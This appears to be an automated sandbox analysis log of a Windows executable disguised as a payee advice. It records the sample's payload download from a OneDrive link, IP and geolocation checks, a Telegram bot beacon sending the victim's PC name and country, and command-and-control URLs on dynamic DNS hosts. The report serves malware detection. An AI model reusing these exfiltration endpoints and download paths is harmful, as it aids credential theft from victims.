Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /y4mO9x8ZxntK8YWdNZ0APFyw4ftQiKEA3b9ah1Wz-M1CglBAT974LE8XumXkuL0QoN-7vR_btDJUwSahkUS2M93xLAAR6xUxBf6NEExd3XZo57-YMEfTx94x1QxOp2a-8hq__KMNGGaakccwQ1sWJGhyaRsLbTLnjBQxVFJ7n1h5l7q4yyhOY91F-AdnfAux6c4nzAxrfVrEgoQU3Nn3oITjw/KwTCIrYgMbvy217.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: 4jjxew.dm.files.1drv.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2020/11/2024%20/%2019:18:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: api.onedrive.com
Source: global traffic DNS traffic detected: DNS query: 4jjxew.dm.files.1drv.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.foodex.com.pk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 09:25:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foodex.com.pk
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.foodex.com.pk
Source: PayeeAdvice_HK54912_R0038704_37504.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946432969.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/D
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946432969.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/oft
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/y4mO9x8ZxntK8YWdNZ0APFyw4ftQiKEA3b9ah1Wz-M1CglBAT974LE8XumXkuL0QoN-
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.0000000003378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.onedrive.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946432969.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179903314.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.onedrive.com/v1.0/shares/s
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B82000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B73000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A0E000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A0E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A38000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034B10000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D41000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AE8000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C3F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D1D000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C45000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C1A000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AA1000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AEB000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034B10000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D41000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AE8000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C3F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D1D000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C45000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C1A000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AA1000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AEB000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033BAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040543E
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0040336C EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040336C
Creates files inside the system directory
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File created: C:\Windows\resources\0809 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00404C7B 0_2_00404C7B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_73401B63 0_2_73401B63
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00404C7B 2_2_00404C7B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011C19B 2_2_0011C19B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011D278 2_2_0011D278
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00115362 2_2_00115362
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011C468 2_2_0011C468
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011D548 2_2_0011D548
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011C738 2_2_0011C738
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011E988 2_2_0011E988
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_001169B0 2_2_001169B0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011CA08 2_2_0011CA08
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011CCD8 2_2_0011CCD8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00119E79 2_2_00119E79
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011CFAB 2_2_0011CFAB
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011E97B 2_2_0011E97B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011F960 2_2_0011F960
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_001139F0 2_2_001139F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_001129EC 2_2_001129EC
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00113AA1 2_2_00113AA1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF2F4B 2_2_02EF2F4B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF32F2 2_2_02EF32F2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF3E5B 2_2_02EF3E5B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A51E80 2_2_36A51E80
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A517A0 2_2_36A517A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A55028 2_2_36A55028
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5FC68 2_2_36A5FC68
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A52968 2_2_36A52968
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A59548 2_2_36A59548
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5E6A0 2_2_36A5E6A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5E6B0 2_2_36A5E6B0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5EAF8 2_2_36A5EAF8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5DE00 2_2_36A5DE00
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A51E70 2_2_36A51E70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5E249 2_2_36A5E249
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5E258 2_2_36A5E258
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5F3A8 2_2_36A5F3A8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5F3B8 2_2_36A5F3B8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5178F 2_2_36A5178F
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A59328 2_2_36A59328
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5EB08 2_2_36A5EB08
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5EF60 2_2_36A5EF60
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5EF51 2_2_36A5EF51
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5CCA0 2_2_36A5CCA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5D0F8 2_2_36A5D0F8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A5F801 2_2_36A5F801
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36A50015 2_2_36A50015
